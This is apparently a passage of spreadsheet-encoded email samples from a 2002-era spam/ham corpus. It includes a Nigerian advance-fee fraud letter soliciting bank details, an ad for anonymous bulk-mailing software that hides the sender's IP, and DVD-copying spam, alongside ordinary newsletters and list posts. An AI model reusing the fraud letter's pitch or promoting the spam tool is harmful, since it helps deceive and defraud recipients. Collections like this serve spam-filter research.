 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;
 &lt;/B&gt;
 &lt;BLOCKQUOTE&gt;
   &lt;P&gt;If you are receiving this newsletter it is because you signed up as a 
   member of TheServerSide.com and elected to receive our newsletters. &lt;B&gt;To 
   unsubscribe from TheServerSide.com's bi-weekly newsletter, log on to 
   TheServerSide and edit your user profile. Email webmaster@theserverside.com if 
   you are having problems editing your profile.&lt;/B&gt; &lt;BR&gt;
   &lt;BR&gt;
 &lt;/BLOCKQUOTE&gt;
   &lt;BR&gt;
   &lt;P ALIGN=center&gt;&lt;BR&gt;This newsletter and contents are Copyright (c) 2002 The Middleware Company&lt;BR&gt;&lt;/P&gt;
 &lt;IMG ALT="" SRC="http://lists.theserverside.com/do/12337/850395/1.gif" WIDTH=1 HEIGHT=1&gt;&lt;/body&gt;
 &lt;/HTML&gt;
 --==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Awiating your fax response.
</t>
  </si>
  <si>
    <t xml:space="preserve">(Fax) to  my direct confidential  Fax No: 234 1 7591666  
 Dr. Kataga Bakori
 Lagos, Nigeria.
 23rd July 2002
 Attention President/C.E.O
 Dear Sir,
 REQUEST FOR URGENT BUSINESS RELATIONSHIP.
 Firstly I must solicit your strictest confidence in this subject. This is by virtue of its nature as 
 being utterly confidential and top secret. A member of the Nigeria Export Promotion Council 
 (N.E.P.C.) who was part of the federal government delegation to your country during a trade 
 exhibition gave your particulars to me. I have decided to seek a confidential operation with 
 you in the execution of the deal described hereunder for the benefit of all the parties and 
 hope that you keep it top secret because of the nature of the business.
 Within the ministry of petroleum resources where I work as a director of engineering and 
 projects, and with the co-operation of four other very top officials, we have under our 
 control as overdue contract payments, bills totaling Thirty One Million United States Dollars, 
 which we want to transfer to a foreign account, with the assistance and co-operation of a 
 foreign company to receive the said funds on our behalf or a reliable foreign individual 
 account to receive the funds.
 The source of the fund is as follows: during the last military government here in Nigeria 
 which lasted bout eleven months, government officials set up companies and awarded 
 themselves various contracts which were grossly over-invoiced in various ministries.  The 
 present civilian government is not aware of the atrocities committed by their predecessors 
 and as a result, we have a lot of such over invoiced contract payment s pending which we 
 have identified floating at the central bank of Nigeria ready for payment.  However by virtue 
 of our position as civil servants, we cannot acquire this money in our names.  I was 
 therefore delegated as a matter of urgency by my colleagues to look for an over seas 
 partner into whose account we would transfer the sum of  US$31,000,000.00 (THIRTY 
 ONE MILLION UNITED STATES DOLLARS) hence we are writing you this letter.
  the present civilian government is determined to pay foreign contractors l debts owed 
 so as to maintain an amiable relationship with foreign governments and non-government 
 financial agencies.  We have decided to include our bills for approval with the co-operation 
 of some officials of the federal ministry of finance (F.M.F) and the central bank of Nigeria 
 (C.B.N).  We are seeking your assistance in providing us with a good company account or 
 any other offshore bank account into which we can remit this money by acting our main 
 partner and trustee or acting as the original contractor.  This we can do by swapping of 
 account information and changing of beneficiary and other pertinent information to apply for 
 payment.  By this act, we would be using your company information to apply for payment, 
 and prepare letters of claim and job description on behalf of your company.  This process 
 would be an internal arrangement with the departments concerned.
 I have the authority of my partners involved to propose that should you be willing to assist 
 us in this transaction, your share as compensation will be us$6.2 million (20%), us$21.7 
 million (70%) for us and us$3.1 (10%) for 
 taxation and miscellaneous expenses.
 The business itself is 100% safe, provided you treat it with utmost secrecy and 
 confidentiality.  Also your area of specialization is not m hindrance to the successful 
 execution of this transaction.  I have reposed my confidence in you and hope that you will 
 not disappoint me. 
 I will bring the complete picture of the transaction to your 
 knowledge when I have heard from you.
 Thanks for your co-operation,
 Yours faithfully,
 Dr. Kataga Bakori
 NB: Please respond by sending a facsimile (Fax) to  my direct confidential  Fax No: 234 1 
 7591666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</si>
  <si>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Safely Send Bulk Email Using your Cable or DSL
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --NS_MAIL_Boundary_07132002
 Content-Type: text/html
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;BonFire Anonymous Bulk Emailing Software&lt;/TITLE&gt;&lt;/HEAD&gt;
 &lt;BODY BGCOLOR="White" TEXT="Navy" LINK="Green" VLINK="Blue" ALINK="Red"&gt;
 &lt;FONT SIZE="+3" FACE="Xerox Sans Serif Narrow" COLOR="Red"&gt;
 Introducing the brand new "BonFire" mailer.&lt;/FONT&gt;&lt;BR&gt;
 &lt;FONT SIZE="+1" FACE="Xerox Sans Serif Wide" COLOR="Black"&gt;Anonymous worry
 free bulk email software.&lt;/FONT&gt;&lt;P&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Green"&gt;
 Send bulk email using your DSL or cable connection.&lt;BR&gt;
 .and never lose your connection ISP again.&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt;
 What is BonFire?&lt;BR&gt;
 BonFire software uses unique technology to provide complete anonymous
 delivery.&lt;BR&gt;
 Your IP will never be shown in the headers of any mail sent using
 BonFire.&lt;BR&gt;
 &lt;B&gt;BonFire is Cost Effective&lt;/B&gt;, and is very easy software to use.&lt;BR&gt;
 Simply load your list, message, subject and press 'Send'.&lt;BR&gt;
 Its as easy as that.&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt;
  True anonymity (using proxy routing - the new wave in bulk email stealth
 technology).&lt;BR&gt;
  No more hunting for relays or paying hundreds of dollars for open
 servers.&lt;BR&gt;
  You can run multiple copies simultaneously on different computers.&lt;BR&gt;  
  Port 25 ISP not required (not affected by port 25 blocking).&lt;BR&gt; 
  Speeds of over 300,000 emails per hour confirmed.&lt;BR&gt;
  Simply purchase one of the mailing packages.&lt;BR&gt; 
  Client side software control.&lt;BR&gt;  
  Easy to use interface.&lt;BR&gt;  
  Free upgrades.&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt;
 &lt;B&gt;Pricing..&lt;/B&gt;&lt;BR&gt;
 BonFire is free,&lt;BR&gt;
 &lt;B&gt;BUT.. YOU MUST PURCHASE EMAIL CREDITS IN BLOCKS.&lt;/B&gt;&lt;BR&gt;
 BonFire is subscription based bulk email software system.&lt;BR&gt;
 Our email credits are the lowest priced in the industry.&lt;BR&gt;
 &lt;B&gt;For example:&lt;/B&gt;&lt;BR&gt;
 A purchase of 10 million credits will enable BonFire to send 10 million
 emails,&lt;BR&gt;
 but additional credits must be purchased when the credits run out.&lt;BR&gt;
 BonFire comes with 50,000 &lt;B&gt;FREE&lt;/B&gt; credits..&lt;BR&gt;
 so you can test it for yourself.&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt;
 &lt;B&gt;Credit Prices:&lt;/B&gt;&lt;BR&gt;
 1 Million Email Credits......$99.00&lt;BR&gt;
 5 Million Email Credits......$299.00&lt;BR&gt;
 10 Million Email Credits....$349.00&lt;BR&gt;
 50 Million Email Credits....$899.00&lt;BR&gt; 
 100 Million Email Credits..$1499.00&lt;BR&gt;
 250 Million Email Credits..$2599.00&lt;BR&gt;
 500 Million Email Credits..$3999.00&lt;BR&gt;
 1 Billion Email Credits.......$5999.00&lt;BR&gt;
 10 Billion Email Credits.....$9999.00&lt;BR&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="+1" FACE="Xerox Sans Serif Narrow" COLOR="Red"&gt;
 Free bulletproof mailbox with purchase.&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt; 
 &lt;B&gt;Performance:&lt;/B&gt;&lt;BR&gt;
 The main premise behind BonFire is anonymity to hide your IP
 connection.&lt;BR&gt;
 This has been achieved without any sacrifice in email delivery speed.&lt;BR&gt;
 Best results are on Cable, ADSL, DSL, T1, or a T3 connection,&lt;BR&gt;  
 but a dialup connection will work just fine.&lt;P&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt;
 The type of email lists you use may also affect the software's
 performance.&lt;BR&gt;
 Single domain lists will mail faster than a mixed domain email list.&lt;BR&gt; 
 A smaller message puts less strain on the mail servers,&lt;BR&gt;
 therefore, smaller messages mean faster delivery.&lt;BR&gt;
 A small text or html message is all you need,&lt;BR&gt;
 to get your customers attention.&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt;
 &lt;B&gt;An eye catching subject line is also very important.&lt;/B&gt;&lt;BR&gt;
 BonFire will send either html or text messages.&lt;BR&gt;
 You can also control the BCC count.&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-1" FACE="Xerox Sans Serif Wide" COLOR="Navy"&gt;
 Just check a few boxes and send yourself some messages as a test..&lt;BR&gt;
 You'll see for yourself the great value of the BonFire mailer.&lt;/FONT&gt;&lt;P&gt;
 &lt;FONT SIZE="+2" FACE="Xerox Sans Serif Narrow" COLOR="Red"&gt;
 Click &lt;A HREF="mailto:bonfire1@btamail.net.cn?subject=I am interested in
 BonFire"&gt;Here&lt;/A&gt; to receive BonFire.&lt;/FONT&gt;&lt;P&gt;
 &lt;CENTER&gt;
 ----&lt;BR&gt;
 Save the Planet, Save the Trees, Save the Ozone.&lt;BR&gt;
 Advertise via E-mail, No wasted paper.&lt;BR&gt;
 Delete with one simple keystroke.&lt;BR&gt;
 &lt;FONT COLOR="Red"&gt;Click &lt;A
 HREF="mailto:Remove-Please@btamail.net.cn?subject=Remove"&gt;Here&lt;/A&gt; To Be Removed.&lt;/FONT&gt;
 &lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 --NS_MAIL_Boundary_07132002--
</t>
  </si>
  <si>
    <t xml:space="preserve">
     &gt;&gt; Dunno about the other tools, but SpamAssassin is a breeze ...
     &gt;&gt; SpamAssassin also adds other headers as well, which give you more
     &gt;&gt; detail ...
     Guido&gt; Do you feel capable of writing such a tool?  It doesn't look too
     Guido&gt; hard.
 Sure, but at the moment I have to stop reading email for a few hours and do
 some real work. ;-) I'll see if I can modify GBayes.py suitably over the
 weekend.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Best Price on the netf5f8m1
</t>
  </si>
  <si>
    <t xml:space="preserve"> (suddenlysusan@Stoolmail.zzn.com) on Tuesday, July 30, 2002 at 17:07:56
 : Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://002@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx009 Click to remove http://003@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Good ISP for Mac?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;I managed to get myself an iMac yesterday (just a G3 but a good'un) and was
 &gt;wondering if any of the Apple people on here could recommend a good ISP (for
 &gt;narrow band at the moment) for getting online under OS X.
 &gt;
 &gt;Stew
 my local ISP works great with my iMac. I don't know what you guys 
 have over there, but OS X ought to let you get online as well as 
 anything else.
 Crossing my fingers though....I did a upgrade to Jaguar, and ended up 
 doing a scrape and install after that. 
 Oh, and I am on 56k dialup
 -- 
 Fel
 NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Home Selling? Try Us!
 http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET DIGITAL DISPATCH: Mac zealots unite
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Dispatch Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_a.gif" width="442" height="60" border="0" alt="Digital Dispatch"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=10 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td  width=430&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       		&lt;/table&gt;	
 	&lt;/td&gt;
 	&lt;!-- Skyscraper column --&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/dd_b.gif" width=160 height=18&gt;&lt;br&gt;
 &lt;!-- START AD --&gt;
 &lt;!-- shopping  --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /shopping --&gt;
 &lt;!-- /ad --&gt;
  &lt;br&gt;
 		&lt;!-- right column content --&gt;
 &lt;!-- search form --&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 &lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
  &lt;option value="http://cnet.search.com/search?tag=ex.digital.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.digital.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 				&lt;!-- NEWS BLOCK --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_techNEWS.gif" alt="Tech News News.com" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" cellpadding=0 cellspacing=2 border=0&gt;&lt;tr&gt;
 				&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLsxBpEX3VynhNBuCqlR" &gt;Macworld 2002: New iPods, bigger iMac and more&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI14RdKMuiSkMRUVolYrBeR" &gt;Dell squeezes Pentiums into notebooks&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIw_GUBNEpY0VXXjhrHNHyR" &gt;Microsoft sweetens Mac Office offer&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJWhgClHGGJlh9GpMUHM3FR" &gt;MSN previews next Net service&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWzTR6eGqgsPj9y-DzbW-9R" &gt;Future fuzzy for Adobe camera software&lt;/a&gt;&lt;p&gt;
 &lt;p&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZzgRLDoTLbDr4q1O7VpJcR" &gt;More CNET News&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /NEWS BLOCK --&gt;
 				 &lt;br&gt;
 				&lt;!-- TOP DOWNLOADS --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_TOPdwnlds.gif" alt="Top Downloads" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IMRh5s6epVb8HYULuonXiR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_hxQGxsIC1b2OB8OEPR" &gt;Opera 6.04&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZpCMAiFZ6RaT-Dc13yE_rR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWTQ2zt01j7c7YuNDxuyCiR" &gt;FileMaker Pro 6.0v2&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyslCNlOCGjnbcumX6cvbPR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO1bOfBUIPtvDA4oSMpoLnR" &gt;Balls of Steel Patch 1.3&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjD91yzDgcsUb9HGRJ1bfeR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIczi7p1RRIfgeUef92iqrwyR" &gt;Marine Aquarium 0.99.0 (for the Mac)&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /TOP DOWNLOADS --&gt;
 				 &lt;br&gt;
 				&lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjIiVp03FUhCGLs-y39w-_lR" &gt;Samsung ML-1430 laser printer&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFUHi6kIKlsTn8N_Jj9R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLecuWIM_dNGWF8w6YrPhsR" &gt;Unitech 2U4U DMR-300 MP3 player&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBe5mG-XiMmFz_e0CvgpaFR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCnqnXTcMyCPDuYWD0V_Wy4R" &gt;Video Explosion Deluxe&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU2RSEHGrgfQffN5r5ls4rR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUsXVk1xI5lq9S_p8qkEiiR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsJFTE394BFjAi_TOlRfXPR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section --&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 			&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 &lt;!-- date --&gt;				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=76 align=right&gt;
 						&lt;img src="http://www.cnet.com/i/dp/hd_janicec.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 						--Janice Chen,&lt;br&gt;
 						editor in chief,&lt;br&gt;
 						CNET Reviews&lt;br&gt;
 						&lt;/font&gt;
 					&lt;/td&gt;
 					&lt;td width=10&gt; &lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 						&lt;font size="-1"&gt;
 The majority of PC users may run Windows, but Microsoft can't
 touch the passion that Mac users bring to computing. This week,
 Apple devotees gathered in New York to find out what their guru,
 Steve Jobs, has in store for them. They were not disappointed,
 with offerings ranging from the new iMacs, which continue to push
 the boundaries of the PC form factor, to updated iPods that
 include more memory, better menus, and compatibility with
 Windows. Read the 
 &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyI69zCJKOENBEZdihv9KnR" &gt;full coverage&lt;/a&gt; from 
 CNET's News.com.
 &lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;font size=1&gt; &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 				&lt;td width="175"&gt;&lt;a href="#buzz"&gt;&lt;img src="http://www.cnet.com/i/dp/THISweeks_BUZZ.gif" alt="This Week's Buzz Meter" width="175" height="18" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;td align="left"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#buzz"&gt;Readers mourn Gene Kan&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" height="8" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
